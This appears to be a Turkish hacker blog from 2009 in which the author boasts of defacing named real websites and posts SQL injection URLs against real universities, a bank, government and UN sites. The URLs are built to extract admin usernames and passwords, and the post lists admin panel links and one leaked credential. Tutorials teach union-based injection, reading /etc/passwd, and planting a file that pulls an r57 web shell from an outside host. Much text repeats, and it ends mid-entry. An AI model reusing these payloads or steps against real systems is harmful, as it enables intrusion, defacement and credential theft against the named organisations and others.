pagerank gücenllemesi geldi bide baktım
pr 5 olmuşum hade hayırlısı :D
by TheNeSa
24 Haziran 2009 Çarşamba
19 Haziran 2009 Cuma
Çukurova Üniversitesi Fizik Bölümü - fizik.cu.edu.tr Hacked !
Site:
http://fizik.cu.edu.tr
Mirr0r:
http://zone-h.org/mirror/id/9009398
by TheNeSa
http://fizik.cu.edu.tr
Mirr0r:
http://zone-h.org/mirror/id/9009398
by TheNeSa
www.Nic.ba SQL
Site:
http://www.nic.ba
SQL
http://www.nic.ba/stream/press/index.php?sta=3&pid=113
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25
version 4 tablo tahmin etmek gerekiyo.
tablo bulan basar google'a microsofta
http://www.nic.ba/stream/press/index.php?sta=3&pid=113
%20and%201=2%20union%20select%201,unhex(hex(@@version))
,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
buda panel :
http://www.nic.ba/stream/adminlogin/
by TheNeSa
http://www.nic.ba
SQL
http://www.nic.ba/stream/press/index.php?sta=3&pid=113
and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,
16,17,18,19,20,21,22,23,24,25
version 4 tablo tahmin etmek gerekiyo.
tablo bulan basar google'a microsofta
http://www.nic.ba/stream/press/index.php?sta=3&pid=113
%20and%201=2%20union%20select%201,unhex(hex(@@version))
,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
buda panel :
http://www.nic.ba/stream/adminlogin/
by TheNeSa
18 Haziran 2009 Perşembe
MSSQL Union Kullanımı
mysql de access te herkes union kullanır ama mssql
genelde kullanılmas ve etrafta tek döküman
yok bunun için bende böle bi döküman hazırladım
inş anlatabilmişimdir.
Önce order by ile column sayısını alalım.
http://www.thenesa.com/nesa.asp?id=1 order by 1--
http://www.thenesa.com/nesa.asp?id=1 order by 2--
http://www.thenesa.com/nesa.asp?id=1 order by 3--
http://www.thenesa.com/nesa.asp?id=1 order by 4--
v.s column u eşitledik 4 olsun.
http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 1,2,3,4--
şimdi versionu alalım.
http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 1,2,3,@@version--
ve şimdi de unionla informaion shemadan veri çekelim.
bunu sysobject'den veri almak içinde kullanbilirsiniz bu
size kalmış.
Şimdi Tablo Alalım.
http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 1,2,3,table_name from information_schema.tables--
Bir tablo alırız. Aldığımız tablo admin olsun
http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 1,2,3,table_name from information_schema.tables
where table_name not in ('admin')--
Bu şekilde admin’den sonraki tabloyu alırız.ve soraki tablo
nesa olsun.nesa’dan soraki tabloyuda bu şekilde alıyoruz.
http://www.thenesa.com/nesa.asp?id=1 and 1=2 union select
1,2,3,table_name from information_schema.tables where
table_name not in ('admin','nesa')--
ve ondan soraki tablo...
Column alalım.
http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 11,22,33,column_name from information_schema.columns
where table_name='admin'--
admin tablosunun ilk Column’unu verir. Ilk column id olsun.
http://www.thenesa.com/nesa.asp?id=1 and 1=2 union select
1,2,3,column_name from information_schema.columns where
table_name='admin' and column_name not in ('id')--
id den soraki column.Aldığımız column username olsun.
Soraki column’u alalım.
http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 1,2,3,column_name from information_schema.columns
where table_name='admin' and column_name not in ('id','username')--
bu şekilde.
Şimdide union la veri okuyalım.
http://www.thenesa.com/nesa.asp?id=1 and 1=2 union select
1,2,3,username from admin--
aldığımız username admin olsun. adminden soraki username almak için
http://www.thenesa.com/nesa.asp?id=1 and 1=2 union select
1,2,3,username from admin where username not in ('admin')--
işte bu şekilde...
by TheNeSa
genelde kullanılmas ve etrafta tek döküman
yok bunun için bende böle bi döküman hazırladım
inş anlatabilmişimdir.
Önce order by ile column sayısını alalım.
http://www.thenesa.com/nesa.asp?id=1 order by 1--
http://www.thenesa.com/nesa.asp?id=1 order by 2--
http://www.thenesa.com/nesa.asp?id=1 order by 3--
http://www.thenesa.com/nesa.asp?id=1 order by 4--
v.s column u eşitledik 4 olsun.
http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 1,2,3,4--
şimdi versionu alalım.
http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 1,2,3,@@version--
ve şimdi de unionla informaion shemadan veri çekelim.
bunu sysobject'den veri almak içinde kullanbilirsiniz bu
size kalmış.
Şimdi Tablo Alalım.
http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 1,2,3,table_name from information_schema.tables--
Bir tablo alırız. Aldığımız tablo admin olsun
http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 1,2,3,table_name from information_schema.tables
where table_name not in ('admin')--
Bu şekilde admin’den sonraki tabloyu alırız.ve soraki tablo
nesa olsun.nesa’dan soraki tabloyuda bu şekilde alıyoruz.
http://www.thenesa.com/nesa.asp?id=1 and 1=2 union select
1,2,3,table_name from information_schema.tables where
table_name not in ('admin','nesa')--
ve ondan soraki tablo...
Column alalım.
http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 11,22,33,column_name from information_schema.columns
where table_name='admin'--
admin tablosunun ilk Column’unu verir. Ilk column id olsun.
http://www.thenesa.com/nesa.asp?id=1 and 1=2 union select
1,2,3,column_name from information_schema.columns where
table_name='admin' and column_name not in ('id')--
id den soraki column.Aldığımız column username olsun.
Soraki column’u alalım.
http://www.thenesa.com/nesa.asp?id=1 and 1=2 union
select 1,2,3,column_name from information_schema.columns
where table_name='admin' and column_name not in ('id','username')--
bu şekilde.
Şimdide union la veri okuyalım.
http://www.thenesa.com/nesa.asp?id=1 and 1=2 union select
1,2,3,username from admin--
aldığımız username admin olsun. adminden soraki username almak için
http://www.thenesa.com/nesa.asp?id=1 and 1=2 union select
1,2,3,username from admin where username not in ('admin')--
işte bu şekilde...
by TheNeSa
17 Haziran 2009 Çarşamba
MSSQL’de information_Schema Tablo Column alımı
Tablo alalım.
http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+table_name+from+
information_schema.tables))—
Bir tablo alırız. Aldığımız tablo admin olsun
http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+table_name+from+
information_schema.tables
+where+table_name+not+in+(‘admin')))--
Bu şekilde admin’den sonraki tabloyu alırız.ve soraki tablo
nesa olsun.nesa’dan soraki tabloyuda bu şekilde alıyoruz.
http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+table_name+from+
information_schema.tables
+where+table_name+not+in+('admin','nesa')))--
Column Alalım.
http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+column_name+from+
information_schema.columns
+where+table_name='admin'))--
admin tablosunun ilk Column’unu verir. Ilk column id olsun.
http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+column_name+from+
information_schema.columns
+where+table_name='admin'+and+column_name+
not+in+('id')))—
Id’den sonraki column’u aldık. Aldığımız column username olsun.
Soraki column’u alalım.
http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+column_name+from+
information_schema.columns
+where+table_name='admin'+and+column_name
+not+in+('id','username')))--
bu şekilde soraki column’uda alırıs.
Bide burda veri okuyalım.
http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+username+from+admin))--
aldığımız username admin olsun soraki
username için yine not in kullancas
http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+username+from+admin
+where+username+not+in+('admin')))--
fazla uzatmaya gerek yok bu şekilde işte :D
http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+table_name+from+
information_schema.tables))—
Bir tablo alırız. Aldığımız tablo admin olsun
http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+table_name+from+
information_schema.tables
+where+table_name+not+in+(‘admin')))--
Bu şekilde admin’den sonraki tabloyu alırız.ve soraki tablo
nesa olsun.nesa’dan soraki tabloyuda bu şekilde alıyoruz.
http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+table_name+from+
information_schema.tables
+where+table_name+not+in+('admin','nesa')))--
Column Alalım.
http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+column_name+from+
information_schema.columns
+where+table_name='admin'))--
admin tablosunun ilk Column’unu verir. Ilk column id olsun.
http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+column_name+from+
information_schema.columns
+where+table_name='admin'+and+column_name+
not+in+('id')))—
Id’den sonraki column’u aldık. Aldığımız column username olsun.
Soraki column’u alalım.
http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+column_name+from+
information_schema.columns
+where+table_name='admin'+and+column_name
+not+in+('id','username')))--
bu şekilde soraki column’uda alırıs.
Bide burda veri okuyalım.
http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+username+from+admin))--
aldığımız username admin olsun soraki
username için yine not in kullancas
http://www.thenesa.com/nesa.asp?id=1+and+1=
convert(int,(select+top+1+username+from+admin
+where+username+not+in+('admin')))--
fazla uzatmaya gerek yok bu şekilde işte :D
Unitybank SQL alın size bide Banka :D
Site:
http://www.unitybank.com/
SQL:
http://www.unitybank.com/careers.asp?ntype=-99993+union+select+
0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+tbladmin--
bi bankamız eksikti :D
by TheNeSa
http://www.unitybank.com/
SQL:
http://www.unitybank.com/careers.asp?ntype=-99993+union+select+
0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+tbladmin--
bi bankamız eksikti :D
by TheNeSa
Etiketler:
banka,
cc,
Unitybank SQL alın size bide Banka :D
Zekeriyabeyaz.com.tr SQL
Site:
http://zekeriyabeyaz.com.tr
SQL:
http://zekeriyabeyaz.com.tr/video_izle.asp?id=12+union+select+
0,password,2,3,4,username,6+from+tblconfiguration
çok önceden bulmuştum arşivde gördüm siteye koyim
dedim belki panel bulupta çakan olur :D
by TheNeSa
http://zekeriyabeyaz.com.tr
SQL:
http://zekeriyabeyaz.com.tr/video_izle.asp?id=12+union+select+
0,password,2,3,4,username,6+from+tblconfiguration
çok önceden bulmuştum arşivde gördüm siteye koyim
dedim belki panel bulupta çakan olur :D
by TheNeSa
15 Haziran 2009 Pazartesi
www.fashiontv.com.tr Hacked !
site:
www.fashiontv.com.tr
mirr0r:
http://zone-h.org/mirror/id/9001970
by TheNeSa
www.fashiontv.com.tr
mirr0r:
http://zone-h.org/mirror/id/9001970
by TheNeSa
14 Haziran 2009 Pazar
www.un.org.mv SQL
site:
www.un.org.mv
SQL
http://www.un.org.mv/v2/?lid=15&nid=33 and 1=2+union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+from+users--
isteyen bassın ;)
by TheNeSa
www.un.org.mv
SQL
http://www.un.org.mv/v2/?lid=15&nid=33 and 1=2+union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+from+users--
isteyen bassın ;)
by TheNeSa
www.lada.gr Hacked !
site:
www.lada.gr
mirr0r:
http://turk-h.org/defacement/view/326053/lada.gr/_en/
http://mirror-h.com/bak.php/?id=65707
http://turkey-h.org/defacements/?id=58215
by TheNeSa
www.lada.gr
mirr0r:
http://turk-h.org/defacement/view/326053/lada.gr/_en/
http://mirror-h.com/bak.php/?id=65707
http://turkey-h.org/defacements/?id=58215
by TheNeSa
www.bmw.com.tw Hacked !
Site:
www.bmw.com.tw
mirr0r:
http://www.turk-h.org/defacement/view/326027/bmw.com.tw/bmwclub2/
http://www.turkey-h.org/defacements/?id=58060
http://mirror-h.com/bak.php/?id=65622
by TheNeSa
www.bmw.com.tw
mirr0r:
http://www.turk-h.org/defacement/view/326027/bmw.com.tw/bmwclub2/
http://www.turkey-h.org/defacements/?id=58060
http://mirror-h.com/bak.php/?id=65622
by TheNeSa
www.uncapsa.org Hacked !
site:
http://www.uncapsa.org/
http://www.uncapsa.org/Palawija_Detail.asp?VJournalKey=776
mir0r:
http://turkey-h.org/defacements/?id=58049
by TheNeSa
http://www.uncapsa.org/
http://www.uncapsa.org/Palawija_Detail.asp?VJournalKey=776
mir0r:
http://turkey-h.org/defacements/?id=58049
by TheNeSa
13 Haziran 2009 Cumartesi
www.microsoftgov.co.kr Hacked
site:
www.microsoftgov.co.kr
mirr0r:
http://zone-h.org/mirror/id/8992543
http://turk-h.org/defacement/view/326017/microsoftgov.co.kr/album/
http://mirror-h.com/bak.php/?id=65612
http://turkey-h.org/defacements/?id=57945
http://www.cyber-mirror.org/Mirror/81413/microsoftgov.co.kr/album/albummain.asp
http://z0ne-h.org/mirror-h/izle.php/?id=836&http://www.microsoftgov.co.kr/album/AlbumMain...
by TheNeSa
www.microsoftgov.co.kr
mirr0r:
http://zone-h.org/mirror/id/8992543
http://turk-h.org/defacement/view/326017/microsoftgov.co.kr/album/
http://mirror-h.com/bak.php/?id=65612
http://turkey-h.org/defacements/?id=57945
http://www.cyber-mirror.org/Mirror/81413/microsoftgov.co.kr/album/albummain.asp
http://z0ne-h.org/mirror-h/izle.php/?id=836&http://www.microsoftgov.co.kr/album/AlbumMain...
by TheNeSa
Etiketler:
SQL,
thenesa,
www.microsoftgov.co.kr Hacked
microsoft.co.kr Hacked !
site:http://partner.microsoft.co.kr
mirr0rlar:
http://turk-h.org/defacement/view/326016/partner.microsoft.co.kr/a..
http://mirror-h.com/bak.php/?id=65611
http://turkey-h.org/defacements/?id=57942
http://www.cyber-mirror.org/Mirror/81411/partner.microsoft.co.kr/album/albummain.asp
by TheNeSa
mirr0rlar:
http://turk-h.org/defacement/view/326016/partner.microsoft.co.kr/a..
http://mirror-h.com/bak.php/?id=65611
http://turkey-h.org/defacements/?id=57942
http://www.cyber-mirror.org/Mirror/81411/partner.microsoft.co.kr/album/albummain.asp
by TheNeSa
www.odu.edu.tr SQL
http://www.odu.edu.tr/
SQL:
http://www.odu.edu.tr/IdariBirim/tr/sayfa.php?birimid=11
&id=43+AND+1=2+UNION+SELECT+0,1,
group_concat(id,0x3a,username,0x3a
,password),3,4,5,6+FROM+b_yonetici--
by TheNeSa - Thx: DraKuLa
SQL:
http://www.odu.edu.tr/IdariBirim/tr/sayfa.php?birimid=11
&id=43+AND+1=2+UNION+SELECT+0,1,
group_concat(id,0x3a,username,0x3a
,password),3,4,5,6+FROM+b_yonetici--
by TheNeSa - Thx: DraKuLa
www.kku.edu.tr SQL
site:
http://www.kku.edu.tr
SQL:
http://www.kku.edu.tr/fen_edebiyat/detay.php?git=
badalbas&id=58%20and%201=2+union%20select%201,
group_concat(id,0x3a,
username,0x3a,passwd),3+from+manager
md5 kırımadım :S
by TheNeSa
http://www.kku.edu.tr
SQL:
http://www.kku.edu.tr/fen_edebiyat/detay.php?git=
badalbas&id=58%20and%201=2+union%20select%201,
group_concat(id,0x3a,
username,0x3a,passwd),3+from+manager
md5 kırımadım :S
by TheNeSa
www.ce.yildiz.edu.tr SQL
site:
www.ce.yildiz.edu.tr
SQL:
http://www.ce.yildiz.edu.tr/myindex.php?id=3 and 1=2 union select 1,2,3,4--
version 4 tablo kolon uğraşamıyom :S
panel:
http://www.ce.yildiz.edu.tr/login.php
www.ce.yildiz.edu.tr
SQL:
http://www.ce.yildiz.edu.tr/myindex.php?id=3 and 1=2 union select 1,2,3,4--
version 4 tablo kolon uğraşamıyom :S
panel:
http://www.ce.yildiz.edu.tr/login.php
www2.bayar.edu.tr SQL
Site:
www2.bayar.edu.tr
SQL:
http://www2.bayar.edu.tr/duyuru/haber/yazicidostu.php?id=72%20and%201=1+union
+select+0,1,2,3,4,5,6,7,group_concat(username,0x3a,sifre)
,9,10,11,12,13,14,15,16,17,18,19,20,21,23+from+user
http://www2.bayar.edu.tr/duyuru/haber/haber.php?id=316%20and%201=2+union
%20select%201,2,3,4,5,6,7,8,group_concat
(id1,0x3a,username,0x3a,email,0x3a,sifre,0x3a,
aktiv,0x3a,aktson,0x3a),10,11,12,13,14,15,16,17,18
,19,20,21,22,23+from+user--
panel:
http://www2.bayar.edu.tr/duyuru/haber/panel/login.php
by TheNeSa
www2.bayar.edu.tr
SQL:
http://www2.bayar.edu.tr/duyuru/haber/yazicidostu.php?id=72%20and%201=1+union
+select+0,1,2,3,4,5,6,7,group_concat(username,0x3a,sifre)
,9,10,11,12,13,14,15,16,17,18,19,20,21,23+from+user
http://www2.bayar.edu.tr/duyuru/haber/haber.php?id=316%20and%201=2+union
%20select%201,2,3,4,5,6,7,8,group_concat
(id1,0x3a,username,0x3a,email,0x3a,sifre,0x3a,
aktiv,0x3a,aktson,0x3a),10,11,12,13,14,15,16,17,18
,19,20,21,22,23+from+user--
panel:
http://www2.bayar.edu.tr/duyuru/haber/panel/login.php
by TheNeSa
www.pmyo.sakarya.edu.tr SQL
Site:
http://www.pmyo.sakarya.edu.tr
SQL:
http://www.pmyo.sakarya.edu.tr/haber.php?id=78%20and%201=2+union%20select
%201,group_concat(id,0x3a,username,0x3a,sifre,0x3a,editorluk)
,3,4,5+from+uyeler
Panel:
http://www.pmyo.sakarya.edu.tr/admin/
by TheNeSa
http://www.pmyo.sakarya.edu.tr
SQL:
http://www.pmyo.sakarya.edu.tr/haber.php?id=78%20and%201=2+union%20select
%201,group_concat(id,0x3a,username,0x3a,sifre,0x3a,editorluk)
,3,4,5+from+uyeler
Panel:
http://www.pmyo.sakarya.edu.tr/admin/
by TheNeSa
12 Haziran 2009 Cuma
Adım Adım www.istanbul.edu.tr SQL
Dbler
http://www.istanbul.edu.tr/fen/mbg/en/haber.php?id=-35%20union%20select%201,2,
group_concat(schema_name),4,5,6+from+
information_schema.schemata
information_schema,dbmbg
Tablolar
http://www.istanbul.edu.tr/fen/mbg/en/haber.php?id=-35%20union%20select%201,
2,group_concat(table_name),4,5,6+from+
information_schema.tables+where+table_schema=
CONCAT(CHAR(100),CHAR(98),CHAR(109),CHAR(98),CHAR(103))
cv,dosya,duyuru,fotokategori,galeri,kategori,makale,personel,slayt,yonetici
Kolonlar
http://www.istanbul.edu.tr/fen/mbg/en/haber.php?id=-35%20union%20select%201,2,
group_concat(column_name),4,5,6+from+information_schema.columns
+where+table_name=CONCAT(CHAR(121),CHAR(111),CHAR(110),
CHAR(101),CHAR(116),CHAR(105),CHAR(99),CHAR(105))
yoneticino,yoneticimail,yoneticiparola
Ve passlar
http://www.istanbul.edu.tr/fen/mbg/en/haber.php?id=-35%20union%20select%201,2,
group_concat(yoneticino,0x3a,yoneticimail,0x3a,yoneticiparola),4,5,6+
from+yonetici
1:molbigen@istanbul.edu.tr:uthgnbkfhr2809546722i3ea
by TheNeSa
http://www.istanbul.edu.tr/fen/mbg/en/haber.php?id=-35%20union%20select%201,2,
group_concat(schema_name),4,5,6+from+
information_schema.schemata
information_schema,dbmbg
Tablolar
http://www.istanbul.edu.tr/fen/mbg/en/haber.php?id=-35%20union%20select%201,
2,group_concat(table_name),4,5,6+from+
information_schema.tables+where+table_schema=
CONCAT(CHAR(100),CHAR(98),CHAR(109),CHAR(98),CHAR(103))
cv,dosya,duyuru,fotokategori,galeri,kategori,makale,personel,slayt,yonetici
Kolonlar
http://www.istanbul.edu.tr/fen/mbg/en/haber.php?id=-35%20union%20select%201,2,
group_concat(column_name),4,5,6+from+information_schema.columns
+where+table_name=CONCAT(CHAR(121),CHAR(111),CHAR(110),
CHAR(101),CHAR(116),CHAR(105),CHAR(99),CHAR(105))
yoneticino,yoneticimail,yoneticiparola
Ve passlar
http://www.istanbul.edu.tr/fen/mbg/en/haber.php?id=-35%20union%20select%201,2,
group_concat(yoneticino,0x3a,yoneticimail,0x3a,yoneticiparola),4,5,6+
from+yonetici
1:molbigen@istanbul.edu.tr:uthgnbkfhr2809546722i3ea
by TheNeSa
www.xoybun.com - www.pdk-xoybun.com Fucked - Fuck Pkk
www.xoybun.com - www.pdk-xoybun.com - Fucked - Fuck Pkk
site1:www.xoybun.com
site2:www.pdk-xoybun.com
zone1:http://zone-h.org/mirror/id/8982909
zone2:http://zone-h.org/mirror/id/8982905
fuck Pkk
by TheNeSa
site1:www.xoybun.com
site2:www.pdk-xoybun.com
zone1:http://zone-h.org/mirror/id/8982909
zone2:http://zone-h.org/mirror/id/8982905
fuck Pkk
by TheNeSa
http://www.bayrampasa.gov.tr SQL
http://www.bayrampasa.gov.tr/modules.php?name
=Sections&op=printpage&artid=9999999+union+select
+group_concat(uid,0x3a,uname,0x3a,pass),
1+from+nuke_users
panel:http://www.bayrampasa.gov.tr/admin/
burda bi yerlede bakmadım :S
by TheNeSa
=Sections&op=printpage&artid=9999999+union+select
+group_concat(uid,0x3a,uname,0x3a,pass),
1+from+nuke_users
panel:http://www.bayrampasa.gov.tr/admin/
burda bi yerlede bakmadım :S
by TheNeSa
http://www.zazaki.org Pkk sitesi SQL
http://www.zazaki.org/modules.php?name=Sections&
sop=printpage&artid=1+union+select+group_concat
(username,0x3a,user_password,
0x3a,user_group_cp),1+from+zazii234_users
http://www.zazaki.org/modules.php?name=Sections&
sop=printpage&artid=1+union+select+group_concat
(0x3a,name,0x3a,pwd,0x3a),1
+from+zazii23_authors
paneli bulamadım bulsam sokcamtım :S
by TheNeSa
sop=printpage&artid=1+union+select+group_concat
(username,0x3a,user_password,
0x3a,user_group_cp),1+from+zazii234_users
http://www.zazaki.org/modules.php?name=Sections&
sop=printpage&artid=1+union+select+group_concat
(0x3a,name,0x3a,pwd,0x3a),1
+from+zazii23_authors
paneli bulamadım bulsam sokcamtım :S
by TheNeSa
11 Haziran 2009 Perşembe
MySQL İnjection Anlatım
Mysql İnjection:
önce kolon sayısını öğrenelim
thenesa.php?id=-1+order+by+xxx--
xx yerine 1,2,10 v.s sayı yazarak kolon öğreniyoruz
kolon sayımız 3 olsun
thenesa.php?id=-1+union+select+0,1,2--
bu şekle dönüştü.
kolonu sayısını bulduk
eğer kolonlar görünmüyosa id'yi -1 99999 -99999
v.s yani kullanılmayan id lerden bitane seçersek sonuç verçektir.
kolon sayılarını eşitledik.
şimdi Load_file ile dosya okuyalım.
eğer makina linux ise
thenesa.php?id=-1+union+select+0,1,
load_file(/etc/passwd)--
engel varsa hexleriz veya char kullanırız.
thenesa.php?=9999999 union select 0,1,
unhex(hex(/etc/passwd)—
thenesa.php?=9999999 union select 0,1,
char(47,101,116,99,47,112,97,115,115,119,100)—
char da benzer şekilde mantık ' vs engelli
karekterleri kullanmama yerine char hex v.s kullanma.
bu şekilde /etc/passwd okuyoruz.
eğer windovs ise
boot.ini‘yi okuyabiliriz
thenesa.php?id=-1+union+select+0,1,
load_file(c:/boot.ini)--
thenesa.php?id=-1+union+select+0,1,load_file
(0×633a2f626f6f742e696 e69)--
işte bu şekilde okuyorus burda config felan okuyabilirsiniz
veya ilerde göreceğimiz dosya uzantısı bulup rfi yiyen dosya
upload edebiliriz v.s geliştirmek size kalmış.
mysql Version'u bulalım.versiyon 4'lerde
tablo kolon tahmin edebilirsiniz.aynen acces gibi.
version 5'lerde tablo kolon çekebilirsiniz.
thenesa.php?id=-9999+union+select+0,1,@@version--
duruma göre hexleyin veya char felan işte..
versiyon 5 varsayalım .information_schema
tablo kolon çekelim.
önce dbleri çekelim
thenesa.php?id=-9999+union+select+0,1,schema_name
+from+information .schemata+limit1,1--
limit 1,1 limit 2.1 v.s yaparak diğer veritablarını alırız.
thenesa.php?id=-9999+union+select+0,1,
group_concat(schema_name)+fr om+information.schemata--
Group ile hepsini alırıs.
şimdi tablo adlarını alalım.
thenesa.php?id=--9999+union+select+0,1,table_name
+from+INFORMATION_ SCHEMA.TABLES+where+
table_schema=’dbadi’+limit 1,1--
limit 1,1 limit 2.1 v.s yaparak diğer tabloları alırız. .
thenesa.php?id=--9999+union+select+0,1,
group_concat(table_name)+fro m+I
NFORMATION_SCHEMA.TABLES+where+
table_schema=’db adi’--
Group ile hepsini alırıs.
kolon adlarınıda alalım.
thenesa.php?id=-9999+union+select+0,1,
COLUMN_NAME+from+INFORMATION _SCHEMA.
COLUMNS+where+table_name=
'tabloadi'+limit+ 1,1--
limit 1,1 limit 2.1 v.s yaparak diğer columnları alırız.
thenesa.php?id=-9999+union+select+0,1,
group_concat(COLUMN_NAME)+fr om+I
NFORMATION_SCHEMA.COLUMNS
+where+table_name='ta bloadi'--
Group ile hepsini alırıs.
mysql kullanıcı adi ve şifre alalım.
thenesa.php?id=-9999+union+select+
user,password+from+mysql.user--
burdan mysql bağlanabilirsiniz..
into outfile ile rfi açalım.
into outfile ile rfi(Remote File İnclusion) açığı oluşturabiliriz.
tabi önce sitein dosya yolunu bulcaz.Onu load_file kullanarak bulabilirsiniz.
bulduk diyelim.
home/nesa/public_html/
yazılabilir bi yere uygulayalım.
thenesa.php?id=-9999+union+select+
''+into+outfile+'/home/nesa/public_html
/images/nesa.php'--
site thenesa.com olsun mesela
thenesa.com/images/nesa.php?nesa=
http://thenesa.by.ru/r57.txt?
Tamamen TheNeSa Tarafından Düzenlenmiştir.
iletişim: msn@thenesa.com - thenesa.blogspot.com
by TheNeSa
önce kolon sayısını öğrenelim
thenesa.php?id=-1+order+by+xxx--
xx yerine 1,2,10 v.s sayı yazarak kolon öğreniyoruz
kolon sayımız 3 olsun
thenesa.php?id=-1+union+select+0,1,2--
bu şekle dönüştü.
kolonu sayısını bulduk
eğer kolonlar görünmüyosa id'yi -1 99999 -99999
v.s yani kullanılmayan id lerden bitane seçersek sonuç verçektir.
kolon sayılarını eşitledik.
şimdi Load_file ile dosya okuyalım.
eğer makina linux ise
thenesa.php?id=-1+union+select+0,1,
load_file(/etc/passwd)--
engel varsa hexleriz veya char kullanırız.
thenesa.php?=9999999 union select 0,1,
unhex(hex(/etc/passwd)—
thenesa.php?=9999999 union select 0,1,
char(47,101,116,99,47,112,97,115,115,119,100)—
char da benzer şekilde mantık ' vs engelli
karekterleri kullanmama yerine char hex v.s kullanma.
bu şekilde /etc/passwd okuyoruz.
eğer windovs ise
boot.ini‘yi okuyabiliriz
thenesa.php?id=-1+union+select+0,1,
load_file(c:/boot.ini)--
thenesa.php?id=-1+union+select+0,1,load_file
(0×633a2f626f6f742e696 e69)--
işte bu şekilde okuyorus burda config felan okuyabilirsiniz
veya ilerde göreceğimiz dosya uzantısı bulup rfi yiyen dosya
upload edebiliriz v.s geliştirmek size kalmış.
mysql Version'u bulalım.versiyon 4'lerde
tablo kolon tahmin edebilirsiniz.aynen acces gibi.
version 5'lerde tablo kolon çekebilirsiniz.
thenesa.php?id=-9999+union+select+0,1,@@version--
duruma göre hexleyin veya char felan işte..
versiyon 5 varsayalım .information_schema
tablo kolon çekelim.
önce dbleri çekelim
thenesa.php?id=-9999+union+select+0,1,schema_name
+from+information .schemata+limit1,1--
limit 1,1 limit 2.1 v.s yaparak diğer veritablarını alırız.
thenesa.php?id=-9999+union+select+0,1,
group_concat(schema_name)+fr om+information.schemata--
Group ile hepsini alırıs.
şimdi tablo adlarını alalım.
thenesa.php?id=--9999+union+select+0,1,table_name
+from+INFORMATION_ SCHEMA.TABLES+where+
table_schema=’dbadi’+limit 1,1--
limit 1,1 limit 2.1 v.s yaparak diğer tabloları alırız. .
thenesa.php?id=--9999+union+select+0,1,
group_concat(table_name)+fro m+I
NFORMATION_SCHEMA.TABLES+where+
table_schema=’db adi’--
Group ile hepsini alırıs.
kolon adlarınıda alalım.
thenesa.php?id=-9999+union+select+0,1,
COLUMN_NAME+from+INFORMATION _SCHEMA.
COLUMNS+where+table_name=
'tabloadi'+limit+ 1,1--
limit 1,1 limit 2.1 v.s yaparak diğer columnları alırız.
thenesa.php?id=-9999+union+select+0,1,
group_concat(COLUMN_NAME)+fr om+I
NFORMATION_SCHEMA.COLUMNS
+where+table_name='ta bloadi'--
Group ile hepsini alırıs.
mysql kullanıcı adi ve şifre alalım.
thenesa.php?id=-9999+union+select+
user,password+from+mysql.user--
burdan mysql bağlanabilirsiniz..
into outfile ile rfi açalım.
into outfile ile rfi(Remote File İnclusion) açığı oluşturabiliriz.
tabi önce sitein dosya yolunu bulcaz.Onu load_file kullanarak bulabilirsiniz.
bulduk diyelim.
home/nesa/public_html/
yazılabilir bi yere uygulayalım.
thenesa.php?id=-9999+union+select+
''+into+outfile+'/home/nesa/public_html
/images/nesa.php'--
site thenesa.com olsun mesela
thenesa.com/images/nesa.php?nesa=
http://thenesa.by.ru/r57.txt?
Tamamen TheNeSa Tarafından Düzenlenmiştir.
iletişim: msn@thenesa.com - thenesa.blogspot.com
by TheNeSa
10 Haziran 2009 Çarşamba
http://www.god.com.hk SQL - Pagerank 5
Site:http://www.god.com.hk
http://www.god.com.hk/product_content.php?
a1catid=558+union+select+0,concat(email,0x3a,
password)+from+member--
by TheNeSa
http://www.god.com.hk/product_content.php?
a1catid=558+union+select+0,concat(email,0x3a,
password)+from+member--
by TheNeSa
9 Haziran 2009 Salı
http://www.rizeram.gov.tr SQL
http://www.rizeram.gov.tr/haberrizeram/
haber_detay.asp?id=-207+union+select+0,1
,2,3,4,5,6,7,8+from+ayarlar
http://www.rizeram.gov.tr/haberrizeram/
admin/admin.asp
by TheNeSa
haber_detay.asp?id=-207+union+select+0,1
,2,3,4,5,6,7,8+from+ayarlar
http://www.rizeram.gov.tr/haberrizeram/
admin/admin.asp
by TheNeSa
http://www.ogm-amasyaobm.gov.tr SQL pagerank 6 :D
http://www.ogm-amasyaobm.gov.tr/haber_detay.asp?id=-78+union+select+0,1,2,3,4,5,6,6,7,8,9,1,11,99,0,0+from+admin
http://www.ogm-amasyaobm.gov.tr/kontrol.asp
by TheNeSa
http://www.ogm-amasyaobm.gov.tr/kontrol.asp
by TheNeSa
http://www.batman-bld.gov.tr SQL
